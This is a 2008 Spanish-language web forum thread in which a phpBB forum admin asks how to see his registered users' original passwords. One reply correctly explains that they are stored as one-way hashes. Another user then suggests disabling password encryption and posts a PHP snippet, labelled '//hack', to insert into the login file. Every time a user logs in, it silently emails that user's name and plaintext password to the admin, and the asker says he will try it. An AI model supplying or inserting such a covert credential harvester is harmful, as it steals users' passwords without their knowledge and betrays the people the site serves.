Foros del Web » Creando para Internet » Sistemas de gestión de contenidos »

Hay alguna forma de saber las contraseñas de los usuarios registrados foro phpbb3

Estas en el tema de Hay alguna forma de saber las contraseñas de los usuarios registrados foro phpbb3 en el foro de Sistemas de gestión de contenidos en Foros del Web. Cuando accedo al panel de control de mi foro phpbb3: General/Acceso rapido/Administrar grupos/Grupos predefinidos/Usuarios registrados/usuarios/Usuarios aprobados Cuando cliqueo en cualquiera de ellos observo su correo ...
  #1 (permalink)  
Antiguo 08/08/2008, 13:44
Avatar de mister_x  
Fecha de Ingreso: agosto-2008
Mensajes: 43
Antigüedad: 15 años, 8 meses
Puntos: 0
Hay alguna forma de saber las contraseñas de los usuarios registrados foro phpbb3

Cuando accedo al panel de control de mi foro phpbb3:

General/Acceso rapido/Administrar grupos/Grupos predefinidos/Usuarios registrados/usuarios/Usuarios aprobados

Cuando cliqueo en cualquiera de ellos observo su correo electronico, fecha de registro, nombre de usuario y me posibilita el poder cambiar el correo electronico del usuario y cambiarle la clave de acceso. Pero lo que no veo son las contraseñas que utilizaron en un inicio cuando se registraron

¿Como puedo saber las contraseñas de los usuarios registrados, pues en el caso que me encuentro ahora tengo que cambiarle la clave y enviarsela personalmente con mi cliente de correo?

Ya que no funciona el envio de contraseñas olvidadas por correo electronico

En espera de repuestas


Saludos

Saludos.
  #2 (permalink)  
Antiguo 08/08/2008, 13:46
Avatar de ferny
Il capo della mafia
 
Fecha de Ingreso: febrero-2002
Ubicación: Al final del cable
Mensajes: 10.080
Antigüedad: 22 años, 1 mes
Puntos: 55
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

No se puede saber la contraseña porque ésta se guarda encriptada en la base de datos, usando un algoritmo de un sólo sentido (es decir, que no se puede desencriptar). Lo más que puedes hacer es poner tú otra contraseña y enviarla por correo, pero no puedes saber la que usaron al registrarse
__________________
www.mundodivx.com || www.mundodivx.org

Pon tu mano en un horno caliente durante un minuto y te parecerá una hora.
Siéntate junto a una chica preciosa durante una hora y te parecerá un minuto.
Eso es la relatividad.
  #3 (permalink)  
Antiguo 08/08/2008, 14:39
Avatar de mister_x  
Fecha de Ingreso: agosto-2008
Mensajes: 43
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

Ok, gracias por la información

Saludos
  #4 (permalink)  
Antiguo 09/08/2008, 00:47
agd
 
Fecha de Ingreso: mayo-2008
Mensajes: 98
Antigüedad: 15 años, 11 meses
Puntos: 2
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

hay algo que puedes hacer para saberlas

1- Antes de instalar tu foro, deshabilita la funcion que encripta las contraseñas.
2- Podes poner en el formulario de registro una funcion que te envie un email con los datos ingresados del usuario..
  #5 (permalink)  
Antiguo 09/08/2008, 05:53
Avatar de mister_x  
Fecha de Ingreso: agosto-2008
Mensajes: 43
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

Hola agd, gracias por tu información

¿Como se pone en el formulario de registro la funcion que me envie un email con los datos ingresados del usuario..?


¿Se podría hacer, cuando el foro este ya instalado, aunque no este deshabilitada la funcion que encripta las contraseñas?

En espera de repuestas


Saludos
  #6 (permalink)  
Antiguo 11/08/2008, 08:55
agd
 
Fecha de Ingreso: mayo-2008
Mensajes: 98
Antigüedad: 15 años, 11 meses
Puntos: 2
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

Abre el archivo loguin.php //no importa si ya esta instalado

Encuentra//

Código PHP:
$username = isset($HTTP_POST_VARS['username']) ? phpbb_clean_username($HTTP_POST_VARS['username']) : '';
        
$password = isset($HTTP_POST_VARS['password']) ? $HTTP_POST_VARS['password'] : ''
Y a continuacion agrega esto//

Código PHP:
//hack

        
$para "tu email";
        
$de "From: Mail desde tu foro phpbb2 <tu email>";
        
$asunto "Usuario";
        
$cuerpo "Usuario: ".$HTTP_POST_VARS['username']."\r\n";
        
$cuerpo.= "Pass: ".$HTTP_POST_VARS['password']."\r\n";
        
        
mail($para,$asunto,$cuerpo,$de);



        
//hack end 

y listo :)
  #7 (permalink)  
Antiguo 11/08/2008, 12:37
Avatar de mister_x  
Fecha de Ingreso: agosto-2008
Mensajes: 43
Antigüedad: 15 años, 8 meses
Puntos: 0
Respuesta: Hay alguna forma de saber las contraseñas de los usuarios registrados foro

Ok lo probaré

Gracias por la información

Saludos
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Tema Cerrado




La zona horaria es GMT -6. Ahora son las 12:17.